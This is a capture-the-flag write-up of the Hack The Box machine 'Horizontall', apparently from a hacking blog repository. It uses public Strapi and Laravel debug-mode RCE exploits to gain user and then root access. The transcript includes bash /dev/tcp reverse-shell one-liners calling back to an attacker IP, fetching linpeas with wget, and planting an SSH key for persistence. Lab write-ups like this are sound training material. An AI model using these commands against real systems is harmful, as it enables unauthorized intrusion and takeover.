oxeo0/hacking-blogposts
1
0
Fork 0
mirror of http://git.nowherejezfoltodf4jiyl6r56jnzintap5vyjlia7fkirfsnfizflqd.onion/nihilist/hacking-blogposts.git synced 2025-05-16 04:16:59 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions
hacking-blogposts/Easy/68.md

436 lines
17 KiB
Markdown
Raw Permalink Blame History

---
search:
exclude: true
---
# Horizontall Writeup
![](img/68.png)
## Introduction :
Horizontall is an easy Linux box released back in August 2021.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ sudo vim /etc/hosts
[sudo] password for nothing:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ nmap -sCV -p- horizontall.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 15:08 UTC
Nmap scan report for horizontall.htb (10.129.17.82)
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: horizontall
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.62 seconds
## **Part 2 : Getting User Access**
Our nmap scan picked up port 80 so let's investigate it:
![](prg/68_001.png)
Trying to run gobuster on this site yields no results, so instead we look for other clues by intercepting the traffic with burpsuite:
![](prg/68_002.png)
And here we found out that there was another domain we could use: **api-prod.horizontall.htb** so let's add it to our hosts file:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ sudo vim /etc/hosts
[sudo] password for nothing:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ cat /etc/hosts | grep horizontall
10.129.17.82 horizontall.htb api-prod.horizontall.htb
So let's browse to the api endpoint at **http://api-prod.horizontall.htb/reviews** :
![](prg/68_003.png)
Then let's enumerate it with gobuster:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://api-prod.horizontall.htb
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://api-prod.horizontall.htb
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/20 15:47:07 Starting gobuster in directory enumeration mode
===============================================================
/reviews (Status: 200) [Size: 507]
/users (Status: 403) [Size: 60]
**/admin (Status: 200) [Size: 854]**
/Reviews (Status: 200) [Size: 507]
/Users (Status: 403) [Size: 60]
/admin looks interesting, so let's investigate it:
![](prg/68_004.png)
Here we have a strapi admin login webpage, so let's take a look at the available exploits for it:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ searchsploit strapi
----------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------- ---------------------------------
Strapi 3.0.0-beta - Set Password (Unauthenticated) | multiple/webapps/50237.py
Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated) | multiple/webapps/50238.py
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) | multiple/webapps/50239.py
Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit) | nodejs/webapps/50716.rb
----------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Let's use the Unauthenticated exploit:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ cp $(locate 50239.py) .
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ vim 50239.py
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ python3 50239.py http://api-prod.horizontall.htb/
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjY4OTYyMjQ1LCJleHAiOjE2NzE1NTQyNDV9.9bnkS2ZxD8V5_RR-urF403xy8g-VVYaeukmKEBBGCK4
$>
This exploit basically resets the **admin@horizontall.htb** user's password to **SuperStrongPassword1** so once we ran it we can login:
![](prg/68_005.png)
but the more interesting part is that we can execute code:
$> bash
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
id
However as you can see it is a blind RCE, we can't see any output, so to counter that we're going to get a reverse shell instead:
[term 1]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ nc -lvnp 9999
[term2]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ python3 50239.py http://api-prod.horizontall.htb/
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjY4OTYyNDc3LCJleHAiOjE2NzE1NTQ0Nzd9.5lNGdTyiV9d-ciGggW5Z5Y6OJNZPARJAWBtM41qxW7A
$> bash -c 'bash -i >& /dev/tcp/10.10.16.14/9999 0>&1'
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
[term1]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ nc -lvnp 9999
Connection from 10.129.17.82:42004
bash: cannot set terminal process group (1975): Inappropriate ioctl for device
bash: no job control in this shell
strapi@horizontall:~/myapi$ id
id
uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)
strapi@horizontall:~/myapi$
Now that we got a reverse shell, let's upgrade it to a fully interactive tty:
strapi@horizontall:~/myapi$ which wget curl python python3
which wget curl python python3
/usr/bin/wget
/usr/bin/curl
/usr/bin/python
/usr/bin/python3
#spawn a TTY shell with python3:
strapi@horizontall:~/myapi$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
#CTRL+Z to background the process
strapi@horizontall:~/myapi$ ^Z
[1] + 3112123 suspended nc -lvnp 9999
#stty raw it and then bring it back to the foreground:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ stty raw -echo ; fg
[1] + 3112123 continued nc -lvnp 9999
#then set the TERM and SHELL env variables and the tty rows and colums:
strapi@horizontall:~/myapi$ export TERM=screen-256color
strapi@horizontall:~/myapi$ export SHELL=bash
strapi@horizontall:~/myapi$ stty rows 30 cols 200
#reset to refresh the terminal
strapi@horizontall:~/myapi$ reset
Now that we have a fully interactive TTY reverse shell, we can go grab the user flag:
strapi@horizontall:~$ cd /home/
strapi@horizontall:/home$ ls
developer
strapi@horizontall:/home$ cd developer/
strapi@horizontall:/home/developer$ ls
composer-setup.php myproject user.txt
strapi@horizontall:/home/developer$ cat user.txt
fcXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get the user flag.
## **Part 3 : Getting Root Access**
Now just like on the BountyHunter box, we use linpeas.sh to enumerate privesc paths:
[term1]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ cp ../BountyHunter/linpeas.sh .
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
[term2]
strapi@horizontall:/tmp$ wget http://10.10.16.14:9090/linpeas.sh
strapi@horizontall:/tmp$ chmod +x linpeas.sh
strapi@horizontall:/tmp$ ./linpeas.sh
` ![](prg/68_006.png)
Now what's interesting here is the local port 8000:
![](prg/68_007.png)
As it is written, it's a local port, so let's port forward it via SSH:
[term1]
strapi@horizontall:~$ mkdir .ssh
strapi@horizontall:~$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAfhgjcMFy5mO4fwhQyW6vdX5bgTzqZTh9MhCW7+k6Sj nothing@nowhere' > .ssh/authorized_keys
[term2]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ sshpub -L 8000:127.0.0.1:8000 strapi@horizontall.htb -i ~/.ssh/mainpc
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Nov 20 17:04:40 UTC 2022
System load: 0.0 Processes: 183
Usage of /: 82.1% of 4.85GB Users logged in: 0
Memory usage: 45% IP address for eth0: 10.129.17.82
Swap usage: 0%
0 updates can be applied immediately.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Nov 20 17:01:35 2022 from 10.10.16.14
$
[term3]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ nmap -sCV 127.0.0.1 -p 8000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 17:05 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000048s latency).
PORT STATE SERVICE VERSION
8000/tcp open http (PHP 7.4.22)
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Date: Sun, 20 Nov 2022 17:05:31 GMT
| Connection: close
| X-Powered-By: PHP/7.4.22
| Cache-Control: no-cache, private
| date: Sun, 20 Nov 2022 17:05:31 GMT
| Content-type: text/html; charset=UTF-8
| <****!DOCTYPE html>
| <****html lang="en">
| <****head>
| <****meta charset="utf-8">
| <****meta name="viewport" content="width=device-width, initial-scale=1">
| <****title>Not Found <****/title>
| <****!-- Fonts -->
| <****link rel="preconnect" href="https://fonts.gstatic.com">
| <****link href="https://fonts.googleapis.com/css2?family=Nunito &display;=swap" rel="stylesheet">
| <****style>
| normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}code{font-family:monospace,monospace;font-size:1em}[hidden]{display:none}html{font-family:system-ui,-app
| GetRequest:
| HTTP/1.0 200 OK
| Date: Sun, 20 Nov 2022 17:05:26 GMT
| Connection: close
| X-Powered-By: PHP/7.4.22
| Content-Type: text/html; charset=UTF-8
| Cache-Control: private, must-revalidate
| Date: Sun, 20 Nov 2022 17:05:26 GMT
| pragma: no-cache
| expires: -1
| Set-Cookie: XSRF-TOKEN=eyJpdiI6InJ6Rjhhc0RMR3E0d242U0NrNzNzQ3c9PSIsInZhbHVlIjoiSWNaeGhCZitFTURXR2VlM005QmdsVm5BNFk2cThPN0g1OEJvTi9iUFYyNEpHQWJMZTJuTmtPVGZla3NwbFl5NkhNRHF4ajRBTFFoYzJaL2FCK2pocVkyMTIwVHBqeWRieU1zQWE4S095T1dOTG1rWkZURGF2RnVteTlmdTJ0S0MiLCJtYWMiOiIxZDM2ODdjZjExMmQxYzY4M2Y3ZjZiN2JlYjk2NzNkMWE0YTJkMGExOTkxZjAyZDE4ZDNjMzVjNmI3NTQ0NjdhIn0%3D; expires=Sun, 20-Nov-2022 19:05:26 GMT; Max-Age=7200; path=/; samesite=lax
|_ Set-Cookie: laravel_session=eyJpdiI6IkhtTlZjUnBzZ2RkSDNZMGNhNjA5bWc9PSIsInZhbHVlIjoiYXY0QlozV004N2pydDZ5MVJ2QnJ2RmRnZUYrWVdQR0l4VWVJWmhaMFdpSXFITDdrVnNzYzF4RGhFZlkxczlmSEtaQkFrUDlLcVVXQlBiOTh3U3FxclpoVGxpaDNZMzkvSXhreEZON3
After port-forwarding the port 8000 we see it's a laravel webserver:
![](prg/68_008.png)
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://127.0.0.1:8000
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://127.0.0.1:8000
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/20 17:12:29 Starting gobuster in directory enumeration mode
===============================================================
/profiles (Status: 500) [Size: 616204]
gobuster found /profiles so let's investigate it:
![](prg/68_009.png)
So we know that there's a laravel 8 website on port 8000, and where it is located on the machine thanks to the error we're seeing in /profiles, so let's look for exploits:
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ while true ; do sshpub -L 8000:127.0.0.1:8000 strapi@horizontall.htb -i ~/.ssh/mainpc ; done
#since the ssh port forwarding keeps dying, run it like that ^
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ searchsploit laravel 8
----------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------- ---------------------------------
Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection | php/webapps/50538.txt
Laravel - 'Hash::make()' Password Truncation Security | multiple/remote/39318.txt
**Laravel 8.4.2 debug mode - Remote code execution | php/webapps/49424.py**
Laravel Log Viewer <****0.13.0 - Local File Download | php/webapps/44343.py
Laravel Nova 3.7.0 - 'range' DoS | php/webapps/49198.txt
PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF) | php/webapps/50525.txt
PHP Laravel Framework 5.5.40 / 5.6.x <****5.6.30 - token Unserialize Remote Command Executi | linux/remote/47129.rb
UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read | php/webapps/48166.txt
UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload | php/webapps/46389.py
----------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Let's take a look at the RCE one:
[term1]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ python 49424.py http://127.0.0.1:8000 /home/developer/myproject/storage/logs/laravel.log 'bash -c "(bash -i &>/dev/tcp/10.10.16.14/4444 0>&1)&"'
Exploit...
[term2]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
→ nc -lvnp 4444
Connection from 10.129.17.82:33968
bash: cannot set terminal process group (27737): Inappropriate ioctl for device
bash: no job control in this shell
root@horizontall:/home/developer/myproject/public#
root@horizontall:/home/developer/myproject/public# id
id
uid=0(root) gid=0(root) groups=0(root)
root@horizontall:/home/developer/myproject/public# cd
cd
root@horizontall:~# cat root.txt
cat root.txt
bdXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get the root flag.
## **Conclusion**
Here we can see the progress graph :
![](img/68_graph.png)
Reference in a new issue View git blame Copy permalink